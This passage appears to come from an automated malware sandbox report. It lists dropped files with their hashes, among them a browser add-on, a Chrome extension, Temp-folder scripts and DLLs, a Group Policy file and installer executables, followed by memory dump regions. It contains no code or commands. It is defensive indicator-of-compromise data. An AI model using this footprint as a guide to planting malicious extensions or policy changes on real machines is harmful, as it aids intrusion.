                                                                                                                SHA1

                                                                                                                1dc496c7db982eb7feb5d740895b3436b418e580

                                                                                                                SHA256

                                                                                                                cf1b78d621b79a4a0991c29e229baff87a564f7e302bccb2b1e26f495a3d87fd

                                                                                                                SHA512

                                                                                                                7ba2e9e997a1b0310c1488ca2deec6740f140c10bfa3bda62cf83ca49d8674e6fa4b61c4ac3d00a045baff962bc56c2f9cf24d78fd23e914a11f7ed036491582

                                                                                                              • C:\Program Files (x86)\NNFoOxfNKqcU2\YfdUdWE.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                3592b28f33bc4388195e53025e069531

                                                                                                                SHA1

                                                                                                                a7be5ba9a54df62270b03893c06b554d147fb73e

                                                                                                                SHA256

                                                                                                                d7b5cff5f1197395e2ddd6b0387d663b24df624a7d9f8e285e3d375bcb8ec108

                                                                                                                SHA512

                                                                                                                cc56bad5187f6d26b41f9e486457940d1e81b0fd19b74f945c45584f7599377c41d1acd3949a18cc30b9599ee4278ec3b63501e629858ea399e1959c7ab88877

                                                                                                              • C:\Program Files (x86)\VEimOQGFjqRbC\IHOMuZD.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                fdd7c96e11060cea96b803712b672185

                                                                                                                SHA1

                                                                                                                fc6292fbf6c79ba13a3dedd182b99df1799baae5

                                                                                                                SHA256

                                                                                                                892b577ea364b8191abc699d7af13d2d11df1242c5f455085b19640fbd549c1c

                                                                                                                SHA512

                                                                                                                44d335c8d12fe7287a61781a79cf503dd9a2cfba17a99fe58859aa564d95fccf87db6b86f0b551e58801e62c1e2f0090fe7a79062a823ca4c70100f24c442d04

                                                                                                              • C:\Program Files (x86)\cbXLGCfkU\napTaTD.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                49cf6cfa4cbed1c0501a82a2ae13fa79

                                                                                                                SHA1

                                                                                                                593f43365eb2024e5a9541c711858a795da26088

                                                                                                                SHA256

                                                                                                                cd923e1921e85541a8841a3d6c4376cd8356c5e312a1dd75ad8a02ebcce35268

                                                                                                                SHA512

                                                                                                                58b2433cde67408fb4d415b533b869ef5bc77171309ed0ff9852b2e4a5ebf7a14f0264d9fe5d992d42f5f51ad9f4090af2d360eb5f94cd4bbec03d1b74487aa9

                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                                MD5

                                                                                                                862a687a07ef29f52fe48efdbbcacd1e

                                                                                                                SHA1

                                                                                                                0bd14192ab2965ac8d047788ef8191075f5500be

                                                                                                                SHA256

                                                                                                                8c232f382256fac902e307a9fbb66a5f28e3cf33e5a5fb02b8c6cd8ff4c19074

                                                                                                                SHA512

                                                                                                                e1299a56899b35f88f7a957927147be0dcdd7b737d55df207c6a58668cb6edaa3248258f45fbcaf105ce9b04d80b0cfe1d8bc68738e59ae24ad5723f7c4fa263

                                                                                                              • C:\ProgramData\XmGOnMMGQtrDCnVB\LLdsTDC.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                7c20e1a06175bc620a87519547a09bbb

                                                                                                                SHA1

                                                                                                                a7cf7276039b046a2333cde3a4c9dc46b4f4d9c0

                                                                                                                SHA256

                                                                                                                f5658082ea994b2f1eda1bc0f18afeb030a1a8b2aeba83cad81977ad8e33bc5d

                                                                                                                SHA512

                                                                                                                039177e2067920a10732aa51d6f91f706604a2471fa25884262a26689d604c10fcb985c785c05364eef4d85933ebe24848548158b0737b306ade3d8548425cf7

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                Filesize

                                                                                                                187B

                                                                                                                MD5

                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                SHA1

                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                SHA256

                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                SHA512

                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                Filesize

                                                                                                                136B

                                                                                                                MD5

                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                SHA1

                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                SHA256

                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                SHA512

                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                Filesize

                                                                                                                150B

                                                                                                                MD5

                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                SHA1

                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                SHA256

                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                SHA512

                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                a14a49368403ee3a93dd69067d9a5206

                                                                                                                SHA1

                                                                                                                829a779672d2cd2703174c9828467445a2d28cb1

                                                                                                                SHA256

                                                                                                                53dfd2021f5de8ed9e3d09af6419f9fab656fda55f0e4445886d8ceb2b629daf

                                                                                                                SHA512

                                                                                                                2273867ac489386719d0070b0ccf4164666d9a233e02925d7befc7da51d5c22c746bbfc7a50e35f65c35e61c5240197e50be9d32f539294cebd34d9c3a686618

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                a400ec52eda32cbb171a34198af72274

                                                                                                                SHA1

                                                                                                                29703332868cfb1409344f77d4f02beb6f8b8011

                                                                                                                SHA256

                                                                                                                a5683c5ec0ae92c0ac0227a4f2f8e315889840812e754abf22032dddae8f5794

                                                                                                                SHA512

                                                                                                                9b16762b39d8725d52d2aaa5e6d08768227823c9fe81ad61fd42fee8b43536aba7879db0265800170ead966544a00bb008f3e43adf53068584d84ff22783964f

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                a464e7de8970eb2fb3a9fc11c812bee6

                                                                                                                SHA1

                                                                                                                c2b5fb8c94241906fbf2ac33bfa2c2b614981a6f

                                                                                                                SHA256

                                                                                                                b4b8ecdad73aa3f950123d0ce8c16b076c52cb60d792cc8ec81380983e79edc5

                                                                                                                SHA512

                                                                                                                c6b2f1630af2e44a9a9c6c8bbc7d3925a517c3aeadc6c10da1ec713741110b9a4516321cc708f9c66e0ef8bc6573a67049806710000e3726c858d013950c3438

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                01e07497b07a3a4b7ccec37c9c32cf8c

                                                                                                                SHA1

                                                                                                                6ea6557d3c52646e6971e7a4c0aa1f8e382232a2

                                                                                                                SHA256

                                                                                                                343e476d865c0cda8080751e56a332218d66157510e7f051ef3d918ed08b72d9

                                                                                                                SHA512

                                                                                                                a70249e4dd9e9acff1b75c8503ab14f948ca30640172644552b9f10b71d3efcd5289b15fae50b25315d42953817813c549f482e73cd48735df098c424e25cb74

                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                9c70ed6bf7ab892472a8c8bd490f851b

                                                                                                                SHA1

                                                                                                                08f5222d6a6f7638f75649aa61702950c4fab878

                                                                                                                SHA256

                                                                                                                f3f6b3be0b920fb4c8aa4a169af3271851f9145f39f9882b75c7afcc1f5291b9

                                                                                                                SHA512

                                                                                                                d407baa924d758e383e355572b0e1242fcd4db2ec375d2e78cba1fe3197309f8f9766969a0f3e3804a685c409e7eb7bf76c2742a8112cd216a8d2bea6e931cf3

                                                                                                              • C:\Windows\Temp\eARlaXjMdtDvPsxl\iAFjSnID\qyLubuMDXzYhwyTO.wsf

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                                MD5

                                                                                                                280c26c25d2858b626511d08451a6987

                                                                                                                SHA1

                                                                                                                87dcc9a8ca5ed730cae6b40892b77533fd693707

                                                                                                                SHA256

                                                                                                                bf9597f13acb4ad4efba63c2b816d6da5a69b1fc911dc5c145c9695fe328af17

                                                                                                                SHA512

                                                                                                                e0b8f0a67b721d5cd3c92ba972ac5268bf804c64235e1b11a00a0af1d7247129237dc81eb05afd100e014f5c049c497176cc0d0b50b72ab3c78b29f0eb2fab62

                                                                                                              • C:\Windows\Temp\eARlaXjMdtDvPsxl\ikFRrGJk\fAhEKsR.dll

                                                                                                                Filesize

                                                                                                                6.4MB

                                                                                                                MD5

                                                                                                                eb8fe8f2479e1908f5342221c6ee67d0

                                                                                                                SHA1

                                                                                                                ffcfb2704c6f5f0cc9fbfa242ce387a864a3db91

                                                                                                                SHA256

                                                                                                                2dac780f68cd1d2fe6ab55deb4c4ba7b056366e3f71ecdeabf266b26c8e675f6

                                                                                                                SHA512

                                                                                                                16d26f20b205019907f965de52e0780b1f8b48f9e5a925637c61d06fa40fac23d6f2ce21afc1adb2e0fa2c447b4693c0cd6907c0e90c11e2ce6a0995807b7926

                                                                                                              • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                                MD5

                                                                                                                2dc4bc2e47fed64ca6a6d3c702e1ff23

                                                                                                                SHA1

                                                                                                                a0e08c66203b440b92fa20d9b623377ea5f412ce

                                                                                                                SHA256

                                                                                                                2b51ee0c81163ee199179089d082cd21b0c936dcc74a6e2a3419a243ba474b9a

                                                                                                                SHA512

                                                                                                                b3cc67d127e9ac9f1e15d645526bf1897e5e00e9f5924adc3f756834c71d2f68358c13c63fb78414a100cee7c812476ae3547c8251b1eb631a930cfd88205d12

                                                                                                              • \Users\Admin\AppData\Local\Temp\7zSADCC.tmp\Install.exe

                                                                                                                Filesize

                                                                                                                6.4MB

                                                                                                                MD5

                                                                                                                17db0561f981b81085a67e1ac83541f1

                                                                                                                SHA1

                                                                                                                b91d07a9a50ada540757165e81aa038fcceaee73

                                                                                                                SHA256

                                                                                                                61751a2af8795187d1cbd22f6d3b615b6c2426a6464acd48a59abf454ef9d05f

                                                                                                                SHA512

                                                                                                                203997f6171cbe49b948a2dc91d61a81ad66799c3c2998b663effbb0cd0a65ac63c9c594ae8b03474e107548ea6b891c1bc5941642c175655291f5e9c249bb2c

                                                                                                              • \Users\Admin\AppData\Local\Temp\7zSB4DE.tmp\Install.exe

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                                MD5

                                                                                                                c34c1093ccc8999f7489c0a6547cf506

                                                                                                                SHA1

                                                                                                                eae834b6f135dce26f7030daa90e99e7890c047c

                                                                                                                SHA256

                                                                                                                1e6e6deb16d8b4d6f3a495d00fb58cd77d4f9e9c53cc79d3183631ba57a14ed9

                                                                                                                SHA512

                                                                                                                48bcb0b4ffea23c29036c7c57a6ea58ef5dbe6b00fb358e2eed1735008c4ff67f919d397ddb3bf683f29b0b04732774834f29ccd75b7efdc9e6909c9c5b5befa

                                                                                                              • memory/888-352-0x0000000001270000-0x0000000001E93000-memory.dmp

                                                                                                                Filesize

                                                                                                                12.1MB

                                                                                                              • memory/1488-25-0x0000000001650000-0x0000000001CFE000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1488-42-0x0000000001650000-0x0000000001CFE000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1488-29-0x0000000010000000-0x0000000010C23000-memory.dmp

                                                                                                                Filesize

                                                                                                                12.1MB

                                                                                                              • memory/1488-38-0x0000000000FA0000-0x000000000164E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1488-26-0x0000000001650000-0x0000000001CFE000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1488-40-0x0000000001650000-0x0000000001CFE000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1488-23-0x0000000000FA0000-0x000000000164E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1488-24-0x0000000001650000-0x0000000001CFE000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1668-45-0x00000000011B0000-0x000000000185E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1668-46-0x0000000010000000-0x0000000010C23000-memory.dmp

                                                                                                                Filesize

                                                                                                                12.1MB

                                                                                                              • memory/1668-58-0x00000000011B0000-0x000000000185E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1668-89-0x00000000011B0000-0x000000000185E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1972-56-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.9MB

                                                                                                              • memory/1972-57-0x0000000001D90000-0x0000000001D98000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2748-17-0x00000000023F0000-0x0000000002A9E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2796-135-0x00000000014E0000-0x0000000001544000-memory.dmp

                                                                                                                Filesize

                                                                                                                400KB

                                                                                                              • memory/2796-138-0x0000000000A60000-0x000000000110E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2796-102-0x0000000001990000-0x0000000001A15000-memory.dmp

                                                                                                                Filesize

                                                                                                                532KB

                                                                                                              • memory/2796-90-0x0000000010000000-0x0000000010C23000-memory.dmp

                                                                                                                Filesize

                                                                                                                12.1MB

                                                                                                              • memory/2796-329-0x00000000031C0000-0x0000000003292000-memory.dmp

                                                                                                                Filesize

                                                                                                                840KB

                                                                                                              • memory/2796-88-0x0000000000A60000-0x000000000110E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2796-319-0x0000000001A20000-0x0000000001AA2000-memory.dmp

                                                                                                                Filesize

                                                                                                                520KB

                                                                                                              • memory/2796-364-0x0000000000A60000-0x000000000110E000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/3048-69-0x00000000023D0000-0x00000000023D8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/3048-68-0x000000001B4A0000-0x000000001B782000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.9MB